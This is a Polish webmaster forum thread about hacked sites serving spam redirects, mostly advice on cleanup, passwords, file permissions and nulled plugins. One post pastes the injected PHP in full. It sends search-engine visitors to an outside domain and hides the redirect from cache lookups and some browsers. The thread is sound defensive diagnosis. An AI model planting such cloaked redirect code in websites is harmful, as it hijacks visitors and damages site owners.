Spam na stronach (eval(base64_decode...)

[zakręcony]

Ja miałem to samo z Joomlą u Klienta. Każdy skrypt z otwartym kodem źródłowym jest narażony na takie numery, a jeszcze jak dodamy do tego "profesjonalne" podejście do bezpieczeństwa na różnych hostingach, to cud, że ten internet jeszcze nie pierdyknął.

[Sanchez Spinoza]

ok, dzięki.

Wyczyszczę ile się da i zobaczę jak to pójdzie.

Jest może jakiś sposób abym dostawał maila za każdym razem jak "coś" (czytaj ruscy spamerzy) dopisze coś do pliku? Coś w co by globalnie obejmowało wszystkie podfoldery.

[bliker]

a kod ktory ci wbijaja to:

error_reporting(0);

$qazplm=headers_sent();

if (!$qazplm){

$referer=$_SERVER['HTTP_REFERER'];

$uag=$_SERVER['HTTP_USER_AGENT'];

if ($uag) {

if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){

if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {

if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){

header("Location: https://uendkgkw.ddns.me.uk/");

exit();

}

}

}

}

}

[served]

Jest może jakiś sposób abym dostawał maila za każdym razem jak "coś" (czytaj ruscy spamerzy) dopisze coś do pliku?

Napisz skrypt, który będzie sprawdzał cyklicznie checksum'y plików.

[kokodżambo]

Wystarczy usunąć wszystkie skrypty, pluginy, szablony w wersji nulled...

[cancer]

ok, dzięki.

Wyczyszczę ile się da i zobaczę jak to pójdzie.

Sprawdź jakie masz ustawione prawa plików (chmod),przy plikach .php

Zmiana praw dostępu może wyjaśnić twój problem.

[straseusz]

Nie jest to żadne przechwycenie haseł, jeśli by przechwycili dane do ftp to już dawno były by inne "problemy".

Tak jak pisza koledzy - masz nulledy szablony/dodatki i tyle, od tego zacznij.

Swoją drogą to ciesz się że masz tylko takie "oznaki", bo zdarzają się przypadki wyczyszczenia baz i podmiany własnych skryptów(możliwe że domyślne uprawnienia nie pozwalają).

[Sanchez Spinoza]

To nie atakuje tylko Wordpressa. Wszystko zaatakowało.

[cancer]

To nie atakuje tylko Wordpressa. Wszystko zaatakowało.

1. Zmiana wszystkich haseł

2. Jeżeli korzystasz z programu do ftp typu FileZilla, total commander nigdy nie zapisuj w nim haseł.

3. Sprawdź dokładnie komputer z którego wysyłasz pliki na serwer pod kontem trojanów / wirusów.

4. Zeskanuj serwer ( https://sucuri.net/ )

5. Wyślij czysta kopie plików na serwer.

6. Sprawdź jak masz ustawione CHMOD - czyli uprawnienia do plików .

Powinno pomóc

[Imperator]

Miałem kiedyś to samo i problem tkwił w zapisanych hasłach w total commanderze.

[straseusz]

To nie atakuje tylko Wordpressa. Wszystko zaatakowało.

Jasne ze wszystko zaatakuje, chyba po to się robi takie zabezpieczenia. Czy kradnąc komuś auto bierzesz pod uwagę że tam jest bomba ? Gdy bomba wybuchnie i rozp***ierniczy 5 domów to idziesz do właściciela tego auta po odszkodowanie ? Oczywiście że nie Więc nic nie możesz zrobić jeśli coś zaatakuje Ci wszystko co masz na danym hostingu.

Mało tego, niektóre "przerobione" wtyczki(dosyc popularne zresztą) mają opcje przekierowywania podstron na każdej ze stron która jest na hostingu(a nie tylko dla zainstalowanego skryptu). Nie przekierowują jednak zawsze, ale w przypadku konkretnych wejść, dlatego ustalenie o co chodzi jest po prostu trudne.